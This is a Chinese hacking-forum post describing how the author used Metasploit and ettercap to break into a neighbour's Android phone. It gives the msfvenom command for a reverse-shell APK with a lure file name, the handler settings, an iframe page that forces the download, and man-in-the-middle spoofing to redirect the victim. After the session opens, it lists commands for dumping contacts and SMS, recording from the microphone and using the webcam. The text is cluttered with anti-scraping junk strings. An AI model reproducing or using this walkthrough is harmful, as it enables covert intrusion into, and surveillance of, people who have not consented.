找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1827|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

# H+ g' a) k; X 五、msf+ettercap入侵邻居安卓手机 # o+ X- @9 A. |. G! i' F

) l% \( {7 k8 X" E7 A9 W, ^! f

. {6 E* f- ~7 s 首先启动msf [% T8 R* V$ I% L

" f+ g! T' C) H+ p! B/ [

: C5 i# j8 X/ w4 V 先用kali生成一个安卓木马,如下命令: ' r4 Y5 X8 @3 R% z9 O/ w

# P* a7 \* D- Q2 ?, @

2 S0 ~) p! w v. m6 w' [ Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 5 i( C$ @5 s, F. F+ H; d

. N5 c' C9 g! X0 Q: k

- x, r1 d" B5 G$ u 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ; w% H, Q ]7 E2 q: K5 H

, b+ A7 c4 n0 Y% f' d" l

/ {: F+ ~( k9 h- V" d9 X 然后进入msf , Q5 _2 X$ [$ D: Y

8 P9 E8 ~8 v- x

& u! u0 j: ?) n use exploit/multi/handler 6 @, v; C* H9 W! k3 {' [% y8 ~

+ G" q0 d: w# B o+ |

0 r3 ]7 Z* J% s5 R set payload android/meterpreter/reverse_tcp ! w6 V2 B/ k( f5 y" R

# D- b0 d3 z6 A8 @

7 y. U$ w5 @2 i e set LHOST 192.168.0.109 //ipkailiip " c% E6 `) _; k8 H9 L! Y: @

0 V* k8 @2 e T m" z& h

# a. J, X2 z2 Y6 ?7 X1 C# r set LPORT 44444 //端口一定要与前面生成的木马的端口一致 $ A+ w+ o% x" t" v

9 e# k3 d# c, L( n# G6 U3 o

9 _1 t! x+ b' G( \" p! H( a) i Exploit 9 _( X0 r8 p U5 v2 `

5 s* C+ x6 H; y3 T) \/ u& j( [" J

: K1 _/ b; L7 w8 A6 c# M# L+ |, M   |( |+ |3 o9 L1 L+ V

4 a6 G" r3 h( |0 M5 m3 M6 c% K

# t7 o' I( g, Z, F 下面我们开启ettercap -G # b: f6 ^1 p0 a! Q- [$ M$ r% Q

- p0 r P6 A5 Z6 t9 z$ H' H' q

+ k! l5 ~. V& _8 W) Z, D 我物理IP 5 S B& B3 i) s

+ I6 {' D; P, _) @3 E4 B5 P; n& u6 k

% G+ w9 v. K# B0 Y$ V% \! X   : K* i2 o% ?1 R$ W9 T' X8 G/ f

6 `1 ? b% P+ n0 z

( [4 V" A$ l* Y6 f 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ) W0 }! Y" i' {! i$ t

' W' |1 E1 x: O t0 F# m# k

6 b0 n5 d/ n) { 下面我们来设置一下 - o: B8 ?( G( ]1 I J

2 k7 h4 z6 n; x. C9 E( J

5 K7 \8 S7 L1 f+ Z2 f2 z3 f I" P3 \   5 W4 T8 G- u8 X* ]% {: `

# O7 k y j2 e2 N) C" n5 Z4 G

P+ P( ~+ C. f8 {- x, D 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ( ?; Y* r7 H" J6 d7 M0 E+ t r

. o4 l( \" e* d+ J% X' w1 k8 n

# C0 g$ W6 j9 U( ^1 g. x4 z2 W: j: m r   4 c6 F1 ?; [; B# R3 p

5 e) k+ O1 L' _: ^* ]

3 Z& X) a5 V( d3 D3 M   # S$ e/ t$ V/ d, d! \7 ^6 j

. H) I7 i$ s' a- t' \9 \7 o i

8 y' L+ }' k o5 T! S2 d   0 f. p( I; N/ e, |; X

( W: {9 M8 [& p$ r

8 R$ D# ~, |5 `$ @% S( C, a   , K+ H; C) `! B* P: f0 M3 ~% V

9 p0 o' j1 Z( t$ Q) |$ u, j& ~4 T! Z

: d1 B* m ]" @2 v" g: v   9 H( m( F$ h! z6 L5 q' c$ e2 v

. d( H' _3 b1 u# `( V

% t; D M- S8 |   # g- ^3 U/ W# C/ F3 D; j# e& [3 _

4 Q' q4 }, Z b9 L i# F& f4 w

( b o" ]& n: t7 h+ K" w. t. ]   + O) h) q- Z ?' |% {- w2 x4 e

1 D1 Q+ Z7 O& Q* h/ W# e( Q8 y6 n7 V

7 L. c X' N6 p8 |6 M   + Z" d2 J0 G. g7 z! E/ r

$ s* N+ T# V4 m% @2 E

. }" g; P/ A |( o3 }" `0 \3 {* n   $ t1 T" R- I3 v( F# ]

+ @% d; W; b# C+ r

- \& ^) t! h8 f   6 r) o: \, O% q/ l

% \/ ^& S" L5 O1 S% q6 x# l0 i

; l3 i' H, u! U1 ]! \" @ ?2 j: O. n   9 R3 J, X: c7 x# U. G8 g# Z* H

# r: m2 c/ p1 b& k4 q

1 B3 Y2 a% N) E1 ^1 {2 @   , U, X# L m, J! H( }: A4 F) \

5 l: K; t/ I; j9 S

T. ?2 l9 M6 Z# v1 t! C+ ?   ( e o* ?& q1 x4 B* S6 Q# |* P

/ x* e" F; b9 }2 c

' `! x2 U5 Z- d( P/ \5 Z0 M1 |& ` 下面我们开始攻击 : a6 O5 Y% g* E9 C4 O; o

% r( W/ V5 Q5 k

! i) Q' b# `* M$ r: O   ! Z1 V4 @0 ~: L7 q P

. s2 [& ~, c+ s3 ^1 S7 W

& s! w+ P* t* s; \2 {# k8 ~   ; v% ^" Q* l& {1 p7 [: T

; J4 Q- E+ @1 G+ Q' Q+ s

2 G0 L+ Y: u- v- a; K   + n6 b* c* X Y2 d4 Z

0 Y% @+ {6 e( k2 y& a

! f" o0 H& a% J }3 F1 ]   $ ]' O/ @. h1 H3 Y) p9 B

; s( y! l P$ [: E' m

9 A3 D; q# ]2 b3 O4 g; h1 L   ' S0 n8 s8 K- k' z7 ^2 ^

) ~. h+ A9 w- J0 i, p- @

1 z0 J$ M. G& G3 n! I+ { 大概过了5分钟多,发现反弹成功了 6 S/ M! l! }. m! Z A

5 C% }0 A4 l2 e- L y$ R

3 U: f- y: N! Z6 f, b6 K; o+ {( ^' |; X8 V   ( E7 v! f8 `) [ i, C. r

* ?7 r: `) g$ C, ]8 v- D

$ \6 b& v8 }3 K8 S' q2 X% ^   7 l6 `2 s+ s% F$ ]% F

& s+ \+ N4 s; r3 v4 m1 o

: [4 }- S- S; H9 r   + F( S$ C5 f+ |6 O

9 E. h8 f& {/ [/ P

: Q- Z2 E# J0 h" Y   # A# s- p& A8 u7 N4 g: h: }

+ l. M7 c8 D: s ~4 V

/ ~4 L# ~* {4 @4 S3 k   8 ]8 `2 Q: A( R/ o% i

6 y; i* B/ L# ]" C6 x$ |

8 Z. N% Q$ H+ o- e   1 P' ]) E7 Q) `# [3 U% B

, n) {& _( a7 j* c/ @

3 i: d9 D9 g4 z1 Q4 t   5 Z0 o( Y5 N1 B! {0 Z. |5 v

7 w& y* t0 i3 q* V2 ^$ T

^$ \0 M& @. E. q/ v( c% ]% k& ^ 执行命令 - Y% k; ]! Z. }( B, a

; r7 M: _1 I- t5 C

6 }7 y {' Z: E& j. B   2 R* |1 d% U& A; R

' B; ?( o+ d0 v: x8 B) G( p, O

n* B( \: [# D9 q# z2 ^$ h dump_contacts    --》这个是导出电话 & k, H3 ~( O# w5 D$ k9 Z7 P$ E

( Q% W6 U4 Q7 m- |

0 ^- } T/ c- h* W7 z: e dump_sms --》这个是导出信息 & \% s& ?. j% L# }

* H/ y* `# J: u! R( O. f) p% K1 K

8 d7 l4 Z: t, Z" e# M record_mic     Record audio from the default microphone for X seconds 3 K+ y& [* M/ m" Q5 s7 u

8 n$ H3 n8 U- |

, y9 o# ]3 I* J( d2 V     webcam_chat    Start a video chat ( n2 l* P5 N) S& |

& N) H# f3 C. Q2 R3 H8 [" t. ~$ |

$ ?$ o& t7 B: A) K5 v$ ^     webcam_list    List webcams . z% a. W& L# ^1 S

6 d" O9 h9 I8 Q, S1 B8 ~. ^6 t

! j9 p5 Z3 W- I4 J6 t! H2 b B     webcam_snap    Take a snapshot from the specified webcam + L4 q/ r; A% ?7 \5 a

' X% `8 ~# G: z* D- q$ X/ W( p+ d

% b! N1 A/ ?% E! T4 x7 W5 g webcam_stream  lay a video stream from the specified webcam 2 j R( I9 i* R2 L. W* ~) j( q, P

- p8 M/ b/ J2 F. G

8 d7 G0 {) p8 [# w   ) ]- @9 |" U6 C) w8 y

0 I h w8 D4 k/ B( Y

8 a( h/ ~0 [, D; r- h   5 H+ W3 ~0 ^+ |# C1 o

! j" v. ~7 Y+ K m

8 j- H$ r+ B% y* H1 N0 r! f2 I! W3 ~2 d 我们打开看一下电话薄, 6 E$ `9 D: e+ ?$ {6 C

. v! P% n- z& T, D

: D C+ F6 j' e4 p: _8 Z   0 T& q' o7 _* l( z1 w/ Y

% @ X5 y0 H, ]+ n1 D

" b: q1 Z# g$ r0 }' O0 G m   ( x# z# K5 _) `3 {7 d4 B, \

7 E% i3 B0 s# `- g. j& O+ D6 t( _

0 W& j; Y g8 b- C. P) S   ( M8 C' O H7 R7 Q! X

9 y) L0 T. w1 k5 n' G+ R

0 |" c+ O4 |6 _- B$ s6 k2 Q: i% s   1 U6 b5 m; c% h

( s9 {- R% }( B8 g6 K3 z6 f

- ~6 {' c9 H: ~- Y7 z1 _   - D0 N- |: \/ z" @+ R" {8 l

6 J3 Z) C% y1 Q0 B& o7 w7 Q

* @* a! u& k" `4 ?. f   + A, t0 }5 C: i7 m: t- P( {* e

, p# Y' a3 x% l8 r; s

: I" H8 z/ N& B" U6 ^- v 我们同时欺骗成DroidJack木马,使用方法如图: 3 `$ p) |8 p: \6 ?0 p" Y

! A# K) u: `- K$ d e9 A5 m9 J

4 U& f6 M. S% H6 N/ p. J( F+ s   3 l" e: i& Z- N U4 k; @

, |( @ K3 b6 I) l8 H" i9 \

% d" u8 N; S: }+ e: D1 J( i   ! x7 p. H" t9 Q2 }

|9 t; T( P6 u6 o+ [

+ a+ A- s! x$ |; u% A   - t* H) S; A( p- e

- c- _) u5 M+ C9 M9 h8 G

1 B% l$ q: s( f! f+ p 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 1 V, {% {' h& y- l

; }, `8 V+ F! R1 K

( J t) _* x% H   ' l& M0 V: f3 | H9 d m: K r

8 v8 L+ [7 S, ]) A5 W+ H

8 P3 c4 C' @4 ]4 z" E   ) R# B; u m9 S

* P( V6 m! j0 a- Y6 G

6 `% ]+ ?1 F# X4 ^2 N& V9 _( X2 ^   3 Y: N! i3 D) J: X: }/ n' ?) A

) P B: a) j7 v! j* x o! m

7 R1 H L# @1 d0 c* v1 l$ c9 P " w) \% ~8 Z: J1 X' u' c1 d0 K% [

$ S( o: Z0 H: F/ d) a

# n! f+ J9 r* p4 o( y( P. J% a2 I. j
2 k6 i9 z7 y1 @+ {: Y. \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表